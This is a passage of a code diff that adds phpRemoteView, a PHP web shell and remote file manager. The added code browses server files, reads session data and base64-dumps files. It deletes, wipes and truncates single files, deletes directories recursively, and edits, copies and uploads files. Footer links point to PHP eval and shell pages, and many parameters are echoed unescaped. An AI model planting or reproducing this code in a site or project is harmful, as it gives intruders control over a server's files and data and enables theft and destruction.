+               else $tgr=$tmp2['name'];
+               echo jsval($tgr);
+               break;
+            
+            case "a": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval("$tow/$tgr");
+               break;
+
+            case "c": 
+               echo jsval(display_perms($fperms[$k])); break;
+            
+            case "1": echo jsval(date($cp[2],$fctime[$k])); break;
+            
+            case "2": echo jsval(date($cp[2],$fmtime[$k])); break;
+            
+            case "3": echo jsval(date($cp[2],$fatime[$k])); break;
+
+            default: echo "??$cn[$i]??";
+
+         } //switch ($ftype)
+      
+      }//for ($cn)
+      
+      echo "0);\n";
+
+   }//foreach ($names)
+   
+   echo "\n\n</script>\n\n\n";
+   
+   echo '</td></tr></table></td></tr></table></td></tr></table>';
+
+
+   echo "<P align=center>
+   <font size=1 style='Font: 8pt Verdana'><B>
+   <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | 
+   <a href=$self?c=t>PHP eval</a> | 
+   <a href=$self?c=phpinfo>phpinfo()</a> | 
+   <a href=$self?c=t>Shell</a> | 
+   <a href=$self?c=codes>".mm("Char map")."</a> |
+   ".mm("Language").": 
+   <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a>
+   
+   </b>
+   <hr size=1 noshade width=55%><center>
+
+   <table border=0 cellspacing=0 cellpadding=0><tr><td width=32>
+   <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td>
+   <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br>
+   ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td>
+   </tr></table>";
+
+break;
+
+
+case "set": 
+
+   switch ($c2) {
+      case "sort":
+         $name=intval($name);
+         if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
+         $cc[0]=$name;
+         break;
+
+      case "panel":
+         $cn='';
+         foreach ($names as $k=>$v) {
+            if ($v!="") $cn.=substr($v,0,1);
+         }
+         $cc[0]=substr($sort,0,1);
+         $cc[1]=substr($sortby,0,1);
+         $cp[2]=substr($datetime,0,50);
+         $cp[3]=substr($fontname,0,50);
+         $cp[4]=substr($fontsize,0,50);
+
+         //exit("cn=$cn<br>cc=$cc");
+         break;
+
+      case "eng":
+         $cc[5]=1;
+         break;
+
+      case "rus":
+         $cc[5]=2;
+         break;
+
+   }
+
+
+   $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
+   if ($c2=="reset") $cookie=implode("~",$cp_def);
+   //echo "<script>alert('$cookie')</script>";
+   setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
+   header("Location: $ref");
+   echo "<script>location.href=\"$ref\";</script>";
+   //echo "[$ref]";
+   //phpinfo();
+   break;
+
+
+case "setup": 
+
+   echo $GLOBALS['html'];
+
+   echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>";
+
+   echo "<STYLE>
+   .setup {
+      font-size: 8pt;
+      font-family: Tahoma;
+   }
+   HTML, TD {font: 90%}
+   </STYLE>";
+
+   echo "
+   <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>";
+   echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>";
+
+   echo "
+   <form action=$self method=post>
+   <input type=hidden name=c value=\"set\">
+   <input type=hidden name=c2 value=\"panel\">
+   <input type=hidden name=pan value=\"$panel\">
+   <input type=hidden name=ref value=\"$ref\">
+   ";
+   echo "<b><u>".mm("Colums and sort")."</u></b><br>";
+
+   echo "".mm("Sort order").": ";
+   echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">";
+   echo "<label for=q3>".mm("Ascending sort")."</label>";
+   echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">";
+   echo "<label for=q4>".mm("Descending sort")."</label><br>";
+
+   echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">";
+   echo "<label for=q1>".mm("Sort by filename")."</label>";
+   echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">";
+   echo "<label for=q2>".mm("Sort by filename extension")."</label>";
+   echo "<table border=0 cellspacing=0 cellpadding=3>";
+   for ($i=0; $i<2; $i++) {
+      echo "<tr>";
+      for ($j=0; $j<7; $j++) {
+         $n=$j+$i*7;
+         echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>";
+         echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">";
+         echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">";
+         echo "<option value=''>--hidden--";
+         foreach ($cn_name as $kk=>$vv) 
+            echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?" selected":"").">$vv";
+         echo "</select>";
+      }
+      echo "</tr>";
+   }
+   echo "</table><P>";
+
+   echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br>
+   d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>";
+
+   echo "<b><u>".mm("Panel font & size")."</u></b>: 
+   <input type=text name=fontname value=\"$cp[3]\" size=12> 
+   <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>";
+
+   echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>";
+
+   
+   echo "<hr size=1 noshade>";
+   break;
+
+
+
+// view
+case "v":
+
+
+   if (!isset($fnot)) $fnot=0;
+   if (!isset($ftype)) $ftype=0;
+   
+   if ($fnot==0) {
+      echo $GLOBALS['html'];
+      up($d,$f);
+      echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+      up_link($d,$f);
+      echo "<hr size=1 noshade>";
+   }      
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>");
+
+   if ($ftype==0 || $ftype==4) {
+      $buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
+      fclose($fi);
+   }
+
+
+   switch ($ftype) {
+
+   case 0: 
+      echo "<pre>".htmlspecialchars($buf)."</pre>";
+      break;
+
+   case 1: 
+      readfile($d.$f); 
+      break;
+
+   case 2: 
+      header("Content-type: image/gif"); 
+      readfile($d.$f); 
+      break;
+
+   case 3: // download
+
+      if (isset($fatt) && strlen($fatt)>0) {
+          $attach=$fatt; 
+          header("Content-type: text/plain"); 
+      } 
+      else {
+          $attach=$f;
+          header("Content-type: phpspbru"); 
+      }
+      header("Content-disposition: attachment; filename=\"$attach\";"); 
+      readfile($d.$f); 
+      break;
+
+   case 4: // session
+   
+      echo "<xmp>";
+      if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
+         ini_set("session.save_path",$d);
+         session_id($ok[1]);
+         session_start();
+         print_r($HTTP_SESSION_VARS);
+      }
+      else {
+         print_r(unserialize($buf));
+      }
+      echo "</xmp>";//<hr size=1 noshade><xmp>";
+      break;
+
+   }
+
+   break;
+
+
+
+
+
+
+
+case "i": // information for FILE
+
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
+
+   echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td>".mm("Size")."        </td><td> ".filesize($d.$f)."</td></tR>";
+   echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "<tr class=tr><td>".mm("FileType")."    </td><td> ".filetype($d.$f)."</td></tr>";
+   echo "<tr class=tr><td>".mm("Perms")."       </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><P>";
+
+   $fi=@fopen($d.$f,"rb");
+   if ($fi) {
+      $str=fread($fi,$hexdump_lines*$hexdump_rows);
+      echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
+      $n=0;
+      $a0="00000000<br>";
+      $a1="";
+      $a2="";
+      for ($i=0; $i<strlen($str); $i++) {
+         $a1.=sprintf("%02X",ord($str[$i])).' ';
+         switch (ord($str[$i])) {
+            case 0:  $a2.="<font class=s2>0</font>"; break;
+            case 32: 
+            case 10:
+            case 13: $a2.="&nbsp;"; break;
+            default:  $a2.=htmlspecialchars($str[$i]);
+         }
+         $n++;
+         if ($n==$hexdump_rows) {
+            $n=0;
+            if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
+            $a1.="<br>";
+            $a2.="<br>";
+         }
+      }
+      //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
+      echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
+         "$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
+   }
+   
+   echo "<b>Base64: </b>
+   <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr>
+   <P>";
+
+
+   if (!$write_access) exitw();
+
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg=" (".mm("full read/write access").")";
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
+"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td>
+<td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=delete>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Delete this file")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=clean>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("filesize to 0byte")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=touch>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("Set current 'mtime'")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=wipe>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Write '0000..' and delete")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+</tr></table>
+";
+
+   echo "<form action=$self method=post><input type=hidden name=c value=copy>".
+        "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
+        " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
+        "<nobr><input type=submit value='".mm("COPY")."!'>".
+        "&gt;<input type=checkbox name=confirm value=copy></nobr></form>";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"$d$f\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+break;
+
+
+case "base64":
+
+   echo "<pre>\n";
+   $ff=fopen($d.$f,"rb") or exit("<p>access denied");
+   $text=fread($ff,max(filesize($d.$f),$maxsize_fread));
+   fclose($ff);
+   switch ($c2) {
+      case 0:
+         echo base64_encode($text);
+         break;
+      case 1:
+         echo chunk_split(base64_encode($text));
+         break;
+      case 2:
+         $text=base64_encode($text);
+         echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
+         break;
+      case 3:
+         echo base64_decode($text);
+         break;
+   }
+   break;
+
+
+
+case "d": // information for DIRECTORY
+
+   echo $GLOBALS['html'];
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+
+   //up_link($d,"");
+
+   if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
+
+   echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
+
+   echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
+   echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "</td></tr><tr class=tr><td>";
+   echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+
+   echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td>
+   <input type=hidden name=c value=\"tree\">
+   Root <input type=text name=d value=\"$d\"><br>
+   <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
+   <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
+   <input type=submit value='Show TREE directory'>";
+
+   echo "</td></form></tr></table><P>";
+
+
+   
+   if (!$write_access) exitw();
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=files>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=dir>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+</tr></table>
+";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (type full path)
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"".realpath($d)."/\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+
+break;
+
+
+
+case "tree":
+
+$tcolors=array(
+'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
+'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
+
+function dir_tree($df,$level=0) {
+   global $tcolors,$self;
+
+   $df=str_replace("//","/",$df);
+   $dirs=array();
+   $files=array();
+   if ($dir=opendir($df)) {
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            $dirs[]=$file;
+         }
+         else {
+            $files[]=$file;
+         }
+      }
+   }
+   closedir($dir);
+
+   sort($dirs);
+   sort($files);
+   
+   $i=min($level,count($tcolors)-1);
+   $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
+
+   echo "\r\n\r\n\r\n
+   <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
+   <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
+   <tr><td colspan=3 class=dir>".
+   "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
+   $df."</a></td></tr>";
+
+   if (count($dirs) || count($files)) {
+      echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>";
+      for ($i=0; $i<count($files); $i++) {
+         echo $files[$i]." ";
+      }
+      for ($i=0; $i<count($dirs); $i++) {
+         dir_tree($df."/".$dirs[$i],$level+1);
+      }
+      echo "</td><td width=10>&nbsp;</td></tr>";
+   }
+   echo '</table></td></tr></table>';
+}
+
+   echo "
+   <STYLE>
+   .all {
+   font-family: Verdana;
+   font-size: 80%;
+   }
+   .dir {
+   font-family: Verdana;
+   font-size: 95%;
+   background: #666699;
+   font-weight: bold;
+   color: white
+   }
+   </STYLE>";
+   echo $GLOBALS['html'];
+
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+   dir_tree($d);
+   break;
+
+
+
+case "delete":
+
+   if (!$write_access) exitw();
+
+   if (!isset($c2)) exit("err# delete 1");
+   if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>";
+   if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f)) 
+      exit("".mm("Delete cancel - File not found")."");
+   if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
+      exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
+      <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
+       &nbsp; &nbsp; &nbsp;
+      <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
+
+   switch ($c2) {
+   case "delete":
+       //exit("$d $f");
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Delete ok")."";
+       break;
+   case "touch":
+       ob();
+       if (!touch($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Touch ok (set current time to 'modify time')")."";
+       break;
+   case "clean":
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb"); 
+       ftruncate($fi,0);
+       fclose($fi);
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Clean ok (file now empty)")."";
+       break;
+   case "wipe":
+       $size=filesize($d.$f);
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
+       $str=md5("phpspbru".mt_rand(0,999999999).time());
+       for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
+       for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
+       fclose($fi);
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Wipe ok (file deleted)")."";
+       break;
+   }
+
+   //Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+
+   break;
+
+
+case "dirdelete":
+
+   if (!$write_access) exitw();
+
+function dir_delete($df) {
+   echo "<b>".basename($df)."</b><ul>";
+   if ($dir=opendir($df)) {
+      $i=0;
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            dir_delete($df."/".$file);
+         } 
+         else {
+            echo "$file<br>";
+            echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>";
+            unlink($df."/".$file);
+         }
+         $i++;
+      }
+      //if ($i==0) echo "-empty-<br>";
+   }
+   closedir($dir);
+   echo "</ul>";
+   echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
+   rmdir("$df/$file");
+}
+
+   if (!isset($c2)) exit("error dirdelete 1");
+   if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
+   $df="$d";
+
+   switch ($c2) {
+
+      case "files":
+         echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
+         if ($dir=opendir($df)) {
+            while (($file=readdir($dir))!==false) {
+                if ($file=="." || $file=="..") continue;
+                if (is_dir($df.$file))  {
+                   echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+                elseif (is_file($df.$file)) {
+                   echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
+                   unlink($df.$file);
+                   echo "<br>";
+                }
+                else {
+                   echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+            }  
+         }
+         closedir($dir);
+         $ref="$self?c=l&d=".urlencode($d);
+         break;
+   
+      case "dir":
+         echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>";
+         dir_delete($df);
+         $ref="$self?c=l&d=".urlencode(realpath($d."/.."));
+         break;
+   }
+   //header("Location: $ref");
+   echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
+   break;
+
+case "copy": 
+
+   if (!$write_access) exitw();
+
+   if (!isset($from) || !@file_exists($from) || !@realpath($from))
+      exit("err# copy 1, file [$from] not found");
+   if (!isset($to) || strlen($to)==0)
+      exit("err# copy 2, file [$to] not found");
+   echo "Copy: ....<hr size=1 noshade>";
+   if (!copy($from,$to)) { 
+      echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
+   }
+   else
+      echo "".mm("DONE")."!<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
+   break;
+
+
+
+
+case "e": // edit
+
+   if (!$write_access) exitw();
+
+   if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
